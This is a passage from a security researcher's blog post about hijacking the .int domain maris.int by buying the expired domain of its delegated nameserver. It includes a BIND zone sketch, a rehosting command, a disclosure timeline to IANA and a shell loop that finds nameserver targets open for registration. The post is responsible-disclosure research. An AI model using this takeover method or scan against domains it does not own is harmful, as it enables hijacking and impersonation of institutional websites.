;; Query time: 21 msec
;; SERVER: 172.16.0.1#53(172.16.0.1)
;; WHEN: Sat Jun 11 18:16:43 2016
;; MSG SIZE  rcvd: 101

Wow, the base domain doesn’t exist either! This is actually a serious problem, because anyone can register a .be domain name. That means anyone can register aliis.be and take over maris.int, since aliis.be is authoritative for that domain. So, with this information, we purchase aliis.be for around $13. We now have full control of maris.int but, more importantly, we’ve prevented anyone with more malicious intent from taking it over. What to do now?

Restoring maris.int To Its Original Glory

So what did maris.int look like before its nameservers expired? To find out, we can check Archive.org:

https://web.archive.org/web/20020126032540/http://www.maris.int/

The website definitely has a retro feel to it, especially because it has a “best view when using Netscape” image at the bottom of some of its pages:

[Image: netscape]

We can now use an Archive.org downloader to pull a local copy of all of the website’s pages, giving us everything we need to restore this website!

The first thing we need to do is set up DNS for aliis.be. We’ll add an A record for the root domain pointing at an Amazon instance we’ve spun up, plus a wildcard record so that every subdomain query resolves to that same IP. With that, the delegated nameserver (cobalt.aliis.be) now points at our AWS instance. Next, we’ll install the BIND DNS server on the instance and configure it as the authoritative host for the maris.int zone, answering for maris.int and all of its subdomains with the server’s own address. Now any request for maris.int or its subdomains ends up at our server.
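The exact BIND configuration isn’t shown in the post; a minimal sketch of the authoritative setup, assuming hypothetical file paths and 203.0.113.10 (a documentation address) as the AWS instance’s IP:

// /etc/bind/named.conf.local sketch: declare ourselves master for maris.int
zone "maris.int" {
    type master;
    file "/etc/bind/db.maris.int";
};

; /etc/bind/db.maris.int sketch: point the apex and every subdomain at our server
$TTL 3600
@   IN  SOA cobalt.aliis.be. hostmaster.aliis.be. ( 2016062001 3600 600 604800 3600 )
@   IN  NS  cobalt.aliis.be.
@   IN  A   203.0.113.10
*   IN  A   203.0.113.10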

With all of this set up, we can now use Python to rehost the original website (based on the snapshot provided by Archive.org):

[Screenshot: maris_rehosted]
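For reference, the rehosting step can be as simple as Python’s built-in web server (a sketch, assuming the snapshot was mirrored into a local maris_site directory; the post doesn’t specify the exact command used):

# Serve the mirrored snapshot on port 80 (Python 2 era; python3 -m http.server 80 today)
cd maris_site
sudo python -m SimpleHTTPServer 80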

Finally, because I suspect some people may question whether this ever happened, here is an Archive.org snapshot of the restored website (with the text I added): https://web.archive.org/web/20160620005141/http://www.maris.int

Disclosure Timeline

  • June 10, 2016: Initial email is sent to [email protected] communicating that there is an issue that allows the complete takeover of a .int domain name. A link to information about responsible disclosure and a link to my PGP key are provided.
  • June 13, 2016: IANA confirms that this is the correct location for reporting the issue.
  • June 13, 2016: The issue is communicated in full to IANA.
  • June 15, 2016: A follow up email is sent to IANA asking if everything was communicated properly and offering further information if the original report is unclear.
  • June 21, 2016: IANA confirms the issue and states that they will get in contact with the folks at MARIS. The nameservers, however, remain unchanged.
  • July 9, 2016: Issue is publicly disclosed, since no further exploitation is possible (the domain has been purchased by me). I will continue to renew the domain until this vulnerability has been fixed by the folks at MARIS/IANA (and will continue to host their original site unless they prefer otherwise) to prevent others from performing malicious actions with it.

Pondering Issues With Restricted TLDs

The idea of a restricted TLD is an interesting one. The .int TLD is only one of many restricted TLDs out there; others include .gov, .edu, and .mil. The problem with attempting to restrict who can access a specific TLD is that much of DNS and the web is built upon the idea of pointing to third parties. For example, a CNAME record can point a subdomain to another fully qualified domain name (FQDN), and an NS record can likewise be pointed at an arbitrary FQDN. This is what we exploited to take over maris.int. Any DNS record that points to a domain name outside of the restricted TLD space can expire and then be registered by a third party. The same goes for IP addresses: what if you use an A record to point to some third-party web host? If the hosting provider goes out of business and someone else gets control of the IP, they suddenly control a domain or subdomain in your restricted TLD.
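A rough way to hunt for this class of problem is to resolve the registrable base domain of every external record target (a sketch; the base-domain extraction here is naive and ignores multi-label public suffixes such as .co.uk):

# For each external nameserver target, check whether its base domain still exists.
for target in www.ispo.cec.be cobalt.aliis.be; do
    base=$(echo "$target" | awk -F. '{print $(NF-1) "." $NF}')
    status=$(dig +noall +comments A "$base" | awk -F'status: ' 'NF > 1 {print $2}' | cut -d, -f1)
    echo "$target -> $base : $status"   # NXDOMAIN suggests the base domain may be open for registration
done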

Even worse, imagine you still wanted to restrict your TLD space, so you decided that all DNS must point to IP addresses and domains owned by you. You host the DNS and servers for every domain name under your TLD. You’ve finally prevented anyone from getting into your TLD space, right? Well, not quite.

Once we move up the protocol chain a bit we venture into the web, and at this level the tangled nature of the dependencies repeats itself. Say you’re serving up webpages to your visitors on example.restrictedtld, with the servers and the DNS both under your control. What if you want to pull in JavaScript from a CDN? What about CSS, fonts, or images? All of that content must also be hosted by you and you alone; otherwise the domains hosting it could expire as well, leaving you in the same position as before.

To summarize, it’s a fairly hard problem, one that runs against the grain of the Internet’s interconnected design. Given a bit of research and scanning, it would not be hard for an attacker to acquire a subdomain or domain on your restricted TLD.

Until next time,

-mandatory